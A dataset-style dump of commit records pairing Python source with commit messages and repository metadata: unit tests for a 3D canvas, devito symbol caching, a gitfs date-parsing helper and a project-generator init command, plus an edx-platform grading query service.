canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
        # Check coordinates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
|
03f7fa8196d07be89f5ebf6a86c349db035ba82c
|
tests/test_symbol_caching.py
|
tests/test_symbol_caching.py
|
import numpy as np
import pytest
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
    For further explanation consider the symbol u[x, y] and its first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
Add test for symbol cache aliasing
|
SymbolCache: Add test for symbol cache aliasing
|
Python
|
mit
|
opesci/devito,opesci/devito
|
SymbolCache: Add test for symbol cache aliasing
|
import numpy as np
import pytest
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
    For further explanation consider the symbol u[x, y] and its first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
<commit_before><commit_msg>SymbolCache: Add test for symbol cache aliasing<commit_after>
|
import numpy as np
import pytest
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
    For further explanation consider the symbol u[x, y] and its first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
SymbolCache: Add test for symbol cache aliasingimport numpy as np
import pytest
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
    For further explanation consider the symbol u[x, y] and its first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
<commit_before><commit_msg>SymbolCache: Add test for symbol cache aliasing<commit_after>import numpy as np
import pytest
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
    For further explanation consider the symbol u[x, y] and its first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
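To illustrate the aliasing scheme the docstring describes, here is a minimal weakref-based cache sketch (illustrative only, not devito's actual implementation; all names besides _SymbolCache and clear_cache are hypothetical):
import weakref

_SymbolCache = {}  # maps a cache key to a weak reference of the canonical object

def cached(key, factory):
    # Return the live object for key, creating it via factory() when the
    # previous referent has been garbage-collected.
    ref = _SymbolCache.get(key)
    obj = ref() if ref is not None else None
    if obj is None:
        obj = factory()
        _SymbolCache[key] = weakref.ref(obj)
    return obj

def clear_cache():
    # Drop cache entries whose referent no longer exists.
    for key in [k for k, r in _SymbolCache.items() if r() is None]:
        del _SymbolCache[key]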
|
79895e372459b98c610640232d0f6d616cb86f82
|
tests/utils/test_strptime.py
|
tests/utils/test_strptime.py
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
Add test for the strptime util
|
Add test for the strptime util
|
Python
|
apache-2.0
|
rowhit/gitfs,PressLabs/gitfs,PressLabs/gitfs,bussiere/gitfs,ksmaheshkumar/gitfs
|
Add test for the strptime util
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
<commit_before><commit_msg>Add test for the strptime util<commit_after>
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
Add test for the strptime utilimport datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
<commit_before><commit_msg>Add test for the strptime util<commit_after>import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
|
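The gitfs implementation itself is not shown in the record; a minimal sketch consistent with the tested behaviour (a date by default, a datetime when to_datetime=True, ValueError on impossible dates) could be:

import datetime

def strptime(value, fmt, to_datetime=False):
    """Parse value with fmt; return a date unless to_datetime is set.

    datetime.strptime already raises ValueError for impossible dates
    such as '31 Nov', which the last test case relies on.
    """
    parsed = datetime.datetime.strptime(value, fmt)
    return parsed if to_datetime else parsed.date()

assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == datetime.date(2014, 8, 21)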
14f83b8eeaa53b45d243d9c5279749653ed83394
|
tests/test_commands/test_init.py
|
tests/test_commands/test_init.py
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
Test init commands - addition
|
Test init commands - addition
|
Python
|
apache-2.0
|
0xc0170/project_generator,sarahmarshy/project_generator,ohagendorf/project_generator,project-generator/project_generator,hwfwgrp/project_generator,molejar/project_generator
|
Test init commands - addition
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
<commit_before><commit_msg>Test init commands - addition<commit_after>
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
Test init commands - addition# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
<commit_before><commit_msg>Test init commands - addition<commit_after># Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
|
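The test drives the command only through init.help, init.setup and init.run; a hypothetical minimal module that would satisfy it (not project_generator's real code) looks like:

import yaml

help = 'create default projects.yaml and project.yaml records'

def setup(subparser):
    subparser.set_defaults(func=run)  # no extra arguments for an empty project

def run(args):
    # Write the two files the test asserts on; contents are placeholders.
    with open('projects.yaml', 'w') as f:
        yaml.safe_dump({'projects': {}}, f)
    with open('project.yaml', 'w') as f:
        yaml.safe_dump({'common': {'sources': []}}, f)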
7b65f56121f5bc7627890a057d377d6073ecf8d3
|
lms/djangoapps/open_ended_grading/controller_query_service.py
|
lms/djangoapps/open_ended_grading/controller_query_service.py
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
        super(ControllerQueryService, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
Add service to query controller for eta of submission and to check if name is unique
|
Add service to query controller for eta of submission and to check if name is unique
|
Python
|
agpl-3.0
|
Edraak/edx-platform,halvertoluke/edx-platform,BehavioralInsightsTeam/edx-platform,fly19890211/edx-platform,prarthitm/edxplatform,B-MOOC/edx-platform,xingyepei/edx-platform,jjmiranda/edx-platform,jruiperezv/ANALYSE,amir-qayyum-khan/edx-platform,mitocw/edx-platform,arbrandes/edx-platform,IITBinterns13/edx-platform-dev,10clouds/edx-platform,Semi-global/edx-platform,Edraak/edx-platform,ak2703/edx-platform,LICEF/edx-platform,fintech-circle/edx-platform,amir-qayyum-khan/edx-platform,EduPepperPDTesting/pepper2013-testing,LICEF/edx-platform,pdehaye/theming-edx-platform,alu042/edx-platform,tiagochiavericosta/edx-platform,gsehub/edx-platform,dsajkl/reqiop,cyanna/edx-platform,xuxiao19910803/edx-platform,playm2mboy/edx-platform,ubc/edx-platform,analyseuc3m/ANALYSE-v1,ESOedX/edx-platform,yokose-ks/edx-platform,kamalx/edx-platform,Softmotions/edx-platform,kxliugang/edx-platform,ovnicraft/edx-platform,eestay/edx-platform,Ayub-Khan/edx-platform,jswope00/GAI,tanmaykm/edx-platform,Unow/edx-platform,zadgroup/edx-platform,solashirai/edx-platform,simbs/edx-platform,ahmadiga/min_edx,mahendra-r/edx-platform,sudheerchintala/LearnEraPlatForm,praveen-pal/edx-platform,sameetb-cuelogic/edx-platform-test,torchingloom/edx-platform,Livit/Livit.Learn.EdX,bigdatauniversity/edx-platform,hmcmooc/muddx-platform,antonve/s4-project-mooc,dcosentino/edx-platform,cselis86/edx-platform,zadgroup/edx-platform,mahendra-r/edx-platform,shubhdev/edx-platform,devs1991/test_edx_docmode,vasyarv/edx-platform,SravanthiSinha/edx-platform,xinjiguaike/edx-platform,wwj718/edx-platform,eduNEXT/edunext-platform,ak2703/edx-platform,cecep-edu/edx-platform,knehez/edx-platform,dkarakats/edx-platform,zerobatu/edx-platform,ak2703/edx-platform,EduPepperPDTesting/pepper2013-testing,dcosentino/edx-platform,peterm-itr/edx-platform,mbareta/edx-platform-ft,DefyVentures/edx-platform,Softmotions/edx-platform,prarthitm/edxplatform,antonve/s4-project-mooc,utecuy/edx-platform,BehavioralInsightsTeam/edx-platform,shabab12/edx-platform,shubhdev/edx-platform,jazztpt/edx-platform,OmarIthawi/edx-platform,raccoongang/edx-platform,mcgachey/edx-platform,hmcmooc/muddx-platform,Shrhawk/edx-platform,doganov/edx-platform,chand3040/cloud_that,mahendra-r/edx-platform,msegado/edx-platform,fly19890211/edx-platform,LICEF/edx-platform,dsajkl/123,jelugbo/tundex,Ayub-Khan/edx-platform,J861449197/edx-platform,tanmaykm/edx-platform,BehavioralInsightsTeam/edx-platform,fly19890211/edx-platform,deepsrijit1105/edx-platform,cyanna/edx-platform,simbs/edx-platform,zhenzhai/edx-platform,JCBarahona/edX,eduNEXT/edunext-platform,kxliugang/edx-platform,ZLLab-Mooc/edx-platform,jonathan-beard/edx-platform,jbassen/edx-platform,mjirayu/sit_academy,teltek/edx-platform,devs1991/test_edx_docmode,msegado/edx-platform,jruiperezv/ANALYSE,alexthered/kienhoc-platform,OmarIthawi/edx-platform,appliedx/edx-platform,rhndg/openedx,RPI-OPENEDX/edx-platform,doismellburning/edx-platform,rue89-tech/edx-platform,atsolakid/edx-platform,edx/edx-platform,morpheby/levelup-by,kursitet/edx-platform,eestay/edx-platform,pku9104038/edx-platform,AkA84/edx-platform,don-github/edx-platform,Stanford-Online/edx-platform,jruiperezv/ANALYSE,beacloudgenius/edx-platform,cyanna/edx-platform,don-github/edx-platform,jonathan-beard/edx-platform,zubair-arbi/edx-platform,xuxiao19910803/edx,nanolearningllc/edx-platform-cypress-2,RPI-OPENEDX/edx-platform,beacloudgenius/edx-platform,wwj718/ANALYSE,chauhanhardik/populo,JCBarahona/edX,chrisndodge/edx-platform,ampax/edx-platform-backup,inares/edx-platform,EduPepperPDTesting/pepper2013-testing,mtlchun
/edx,gymnasium/edx-platform,tiagochiavericosta/edx-platform,Lektorium-LLC/edx-platform,nttks/jenkins-test,Shrhawk/edx-platform,hamzehd/edx-platform,B-MOOC/edx-platform,nanolearningllc/edx-platform-cypress-2,pomegranited/edx-platform,mjirayu/sit_academy,appsembler/edx-platform,CourseTalk/edx-platform,caesar2164/edx-platform,JioEducation/edx-platform,kmoocdev/edx-platform,xuxiao19910803/edx,wwj718/ANALYSE,UXE/local-edx,unicri/edx-platform,syjeon/new_edx,Edraak/circleci-edx-platform,EDUlib/edx-platform,edx-solutions/edx-platform,pomegranited/edx-platform,mjg2203/edx-platform-seas,chauhanhardik/populo_2,cselis86/edx-platform,nanolearning/edx-platform,kursitet/edx-platform,abdoosh00/edraak,olexiim/edx-platform,jonathan-beard/edx-platform,kamalx/edx-platform,ZLLab-Mooc/edx-platform,tanmaykm/edx-platform,antonve/s4-project-mooc,hastexo/edx-platform,chauhanhardik/populo,MakeHer/edx-platform,stvstnfrd/edx-platform,romain-li/edx-platform,Edraak/edx-platform,procangroup/edx-platform,devs1991/test_edx_docmode,rhndg/openedx,utecuy/edx-platform,ak2703/edx-platform,eemirtekin/edx-platform,kxliugang/edx-platform,shashank971/edx-platform,chauhanhardik/populo,Edraak/edraak-platform,bitifirefly/edx-platform,gsehub/edx-platform,jbassen/edx-platform,LICEF/edx-platform,SravanthiSinha/edx-platform,nttks/edx-platform,zofuthan/edx-platform,franosincic/edx-platform,mjg2203/edx-platform-seas,angelapper/edx-platform,nikolas/edx-platform,Edraak/edraak-platform,Lektorium-LLC/edx-platform,cecep-edu/edx-platform,Edraak/circleci-edx-platform,jonathan-beard/edx-platform,IITBinterns13/edx-platform-dev,defance/edx-platform,pomegranited/edx-platform,cpennington/edx-platform,rue89-tech/edx-platform,MakeHer/edx-platform,cselis86/edx-platform,jamesblunt/edx-platform,ZLLab-Mooc/edx-platform,CredoReference/edx-platform,Livit/Livit.Learn.EdX,shurihell/testasia,syjeon/new_edx,doismellburning/edx-platform,TsinghuaX/edx-platform,kmoocdev/edx-platform,mushtaqak/edx-platform,unicri/edx-platform,ahmedaljazzar/edx-platform,UOMx/edx-platform,chauhanhardik/populo,bitifirefly/edx-platform,etzhou/edx-platform,kmoocdev/edx-platform,pepeportela/edx-platform,rismalrv/edx-platform,Softmotions/edx-platform,leansoft/edx-platform,chudaol/edx-platform,adoosii/edx-platform,4eek/edx-platform,nikolas/edx-platform,CourseTalk/edx-platform,jelugbo/